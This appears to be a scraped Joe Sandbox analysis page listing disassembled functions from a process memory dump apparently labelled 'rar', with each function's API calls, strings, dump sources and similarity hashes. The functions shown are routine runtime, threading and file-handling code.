Function 00007FF7CF8DD7BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7CF8DE7D0: __vcrt_getptd_noexit.LIBVCRUNTIME ref: 00007FF7CF8DE7D4

__DestructExceptionObject.LIBVCRUNTIME ref: 00007FF7CF8DD7E2
RaiseException.KERNEL32 ref: 00007FF7CF8DD80B
__DestructExceptionObject.LIBVCRUNTIME ref: 00007FF7CF8DD86C

Strings

csm, xrefs: 00007FF7CF8DD83F

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
String ID: csm
API String ID: 2280078643-1018135373
Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
Instruction ID: bc9a889153d240d91880308ccbad0e2d7ed15f478e85d8e36b19a00ed2fe6aba
Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
Instruction Fuzzy Hash: 96213E7B60868286E631EF15E0402AEB7A1FB84BB5F401636DE9D07B95CF3CE451DB20

Function 00007FF7CF8B42CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7CF8B430F
wcschr.LIBVCRUNTIME ref: 00007FF7CF8B432C
wcschr.LIBVCRUNTIME ref: 00007FF7CF8B433C

Strings

%c:\, xrefs: 00007FF7CF8B4302

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: wcschr$swprintf
String ID: %c:\
API String ID: 1303626722-3142399695
Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
Instruction ID: fbd17461e882d0449f5aac42b0038337a763400dfb1663c4a648441ab5fe1d66
Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
Instruction Fuzzy Hash: 87118122A087C281EE247F1199024ADA7B0AF49BA4B988531CF6E437D6DF3CE4719330

Function 00007FF7CF8CB780 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF7CF8CB7C0
CreateSemaphoreW.KERNEL32 ref: 00007FF7CF8CB7D0
CreateEventW.KERNEL32 ref: 00007FF7CF8CB7E7

Strings

Thread pool initialization failed., xrefs: 00007FF7CF8CB803

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
Instruction ID: e98937a33e303053e8ba05cd2c9a800d7a2c143e4eaf24344df3d22740ea3aaa
Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
Instruction Fuzzy Hash: 58112932B15B818AFB049F21E4003E972E2EBD4B68F988035CA4D47259CF3ED4668770

Function 00007FF7CF8D2984 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7CF8D2B96
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7CF8D2BA7

Part of subcall function 00007FF7CF8DBA34: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7CF8DB313), ref: 00007FF7CF8DBAB1
Part of subcall function 00007FF7CF8DBA34: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7CF8DB313), ref: 00007FF7CF8DBAF0

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7CF8D2BB2
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7CF8D2BC3

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
String ID:
API String ID: 904936192-0
Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
Instruction ID: 4097015bffc7aa9acdfca85c7d4882a26d14ca5117f730c20bceafd2af2ce839
Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
Instruction Fuzzy Hash: 3451C362A19AC282EB14DF25D4503ECB3A1FBC4BA4F448232DE5D87794DF79D525D320

Function 00007FF7CF8A3818 Relevance: 6.1, APIs: 4, Instructions: 129filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF7CF89F6FC,00000000,?,?,?,?,00007FF7CF8A097D), ref: 00007FF7CF8A38CD
CreateFileW.KERNEL32(?,?,?,?,?,00007FF7CF89F6FC,00000000,?,?,?,?,00007FF7CF8A097D,?,?,00000000), ref: 00007FF7CF8A391F
SetFileTime.KERNEL32(?,?,?,?,?,00007FF7CF89F6FC,00000000,?,?,?,?,00007FF7CF8A097D,?,?,00000000), ref: 00007FF7CF8A399B
CloseHandle.KERNEL32(?,?,?,?,?,00007FF7CF89F6FC,00000000,?,?,?,?,00007FF7CF8A097D,?,?,00000000), ref: 00007FF7CF8A39A6

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
Instruction ID: 99ee0758ed3bff79a991a30f4893d00dfeeca3650526adca39264a289c89f826
Opcode Fuzzy Hash: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
Instruction Fuzzy Hash: F041E422B0D6C142EA50AE11A4057FAE6E0FF82BB4FA44231EE9D077D4DF3ED5199720

Function 00007FF7CF8D0244 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7CF8D03D3
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7CF8D03E4
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7CF8D03EF
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7CF8D0400

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 932687459-0
Opcode ID: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
Instruction ID: a348cf54f079972ac11b43f1f807a065d08eb304af707853ce56255486bf0f55
Opcode Fuzzy Hash: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
Instruction Fuzzy Hash: A3418D62A0DAC385EB55AE21D0503FDA7D0EF40BA4F984533DB8D06A9DDF2CE4A59331

Function 00007FF7CF8E5120 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E5173
WideCharToMultiByte.KERNEL32 ref: 00007FF7CF8E5245
GetLastError.KERNEL32 ref: 00007FF7CF8E5268
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E529A

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 4141327611-0
Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
Instruction ID: 3041ce6bd27b269b2552bf535b605170d9307ec3b0ee3680fbfeb8f3b640c77c
Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
Instruction Fuzzy Hash: 7341822AA0D7C246FB65AF5094403F9E6E0AF40BB0F944131DA5D8AAD9DF3CE561A730

Function 00007FF7CF89D048 Relevance: 6.1, APIs: 4, Instructions: 77fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00007FF7CF8886CB,?,?,?,00007FF7CF88A5CB,?,?,00000000,?,?,00000040,?,?,00007FF7CF882DF9), ref: 00007FF7CF89D09D
CreateFileW.KERNEL32(?,00007FF7CF8886CB,?,?,?,00007FF7CF88A5CB,?,?,00000000,?,?,00000040,?,?,00007FF7CF882DF9), ref: 00007FF7CF89D0E5
CreateFileW.KERNEL32(?,00007FF7CF8886CB,?,?,?,00007FF7CF88A5CB,?,?,00000000,?,?,00000040,?,?,00007FF7CF882DF9), ref: 00007FF7CF89D114
CreateFileW.KERNEL32(?,00007FF7CF8886CB,?,?,?,00007FF7CF88A5CB,?,?,00000000,?,?,00000040,?,?,00007FF7CF882DF9), ref: 00007FF7CF89D15C

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
Instruction ID: 0de4fcbea9c42b8851d669da0f2c0555f4509668faa732304209a0a04427e35f
Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
Instruction Fuzzy Hash: E4318532618B8586E7609F11F5547AAB7E0F789BB4F904325EAAC47BC8CF3CD1048B24

Function 00007FF7CF8E978C Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7CF8E3CEF,?,?,00000000,00007FF7CF8E3CAA,?,?,00000000,00007FF7CF8E3FD9), ref: 00007FF7CF8E97A5
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7CF8E3CEF,?,?,00000000,00007FF7CF8E3CAA,?,?,00000000,00007FF7CF8E3FD9), ref: 00007FF7CF8E9807
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7CF8E3CEF,?,?,00000000,00007FF7CF8E3CAA,?,?,00000000,00007FF7CF8E3FD9), ref: 00007FF7CF8E9841
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7CF8E3CEF,?,?,00000000,00007FF7CF8E3CAA,?,?,00000000,00007FF7CF8E3FD9), ref: 00007FF7CF8E986B

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
Instruction ID: 706fa81af7bbc066ecea5b28c41690267b8c92ad6ec5c56c8bcffdcd22637d8b
Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
Instruction Fuzzy Hash: F4219535F08BD185E720AF12A840269E6E4FB54FE0F884135DE9E63BA4DF7CD4619364

Function 00007FF7CF8CB4EC Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7CF8CB549
SetPriorityClass.KERNEL32 ref: 00007FF7CF8CB554
GetCurrentThread.KERNEL32 ref: 00007FF7CF8CB55A
SetThreadPriority.KERNEL32 ref: 00007FF7CF8CB565

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CurrentPriorityThread$ClassProcess
String ID:
API String ID: 1171435874-0
Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
Instruction ID: 350b6fd32b60d0dfd635a9144e37d0e9b91da1dd0abc93ee7f0a7178b823a86a
Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
Instruction Fuzzy Hash: FA113371F18B828AE754AF11A8842BCA2D1FF94B70FA05034C60957686DF2CB8656734

Function 00007FF7CF8E5630 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7CF8DF3FC,?,?,?,00007FF7CF8E143D), ref: 00007FF7CF8E563A
SetLastError.KERNEL32(?,?,?,00007FF7CF8DF3FC,?,?,?,00007FF7CF8E143D), ref: 00007FF7CF8E56A2
SetLastError.KERNEL32(?,?,?,00007FF7CF8DF3FC,?,?,?,00007FF7CF8E143D), ref: 00007FF7CF8E56B8
abort.LIBCMT ref: 00007FF7CF8E56BE

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: ErrorLast$abort
String ID:
API String ID: 1447195878-0
Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
Instruction ID: 0190970493cb31ad1c41c8b5f407eea24a8b724345a72c6ab65de75702c5dd6b
Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
Instruction Fuzzy Hash: A2018028B0D6C247FA987F3196552F8D2D14F487B0F940538DD1E4A7E6ED2CE8216230

Function 00007FF7CF8CB850 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7CF8CBBFC: ResetEvent.KERNEL32 ref: 00007FF7CF8CBC15
Part of subcall function 00007FF7CF8CBBFC: ReleaseSemaphore.KERNEL32 ref: 00007FF7CF8CBC2B

ReleaseSemaphore.KERNEL32 ref: 00007FF7CF8CB887
CloseHandle.KERNEL32 ref: 00007FF7CF8CB8A8
DeleteCriticalSection.KERNEL32 ref: 00007FF7CF8CB8C0
CloseHandle.KERNEL32 ref: 00007FF7CF8CB8CE

Part of subcall function 00007FF7CF8CB974: WaitForSingleObject.KERNEL32 ref: 00007FF7CF8CB97B
Part of subcall function 00007FF7CF8CB974: GetLastError.KERNEL32 ref: 00007FF7CF8CB986

Memory Dump Source

Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true

Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd

Similarity

API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 502429940-0
Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
Instruction ID: 2bacf6ac24e59d2cc3b9644779777c9132cb243b4bb481f16e5296c7a2a0fc3e
Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
Instruction Fuzzy Hash: 0A118632618E819BE714AF20D944599E370FB85BB0F400231D7AD132A5CF39E475C724

Function 00007FF7CF8E58A4 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE

Download Yara Rule

APIs

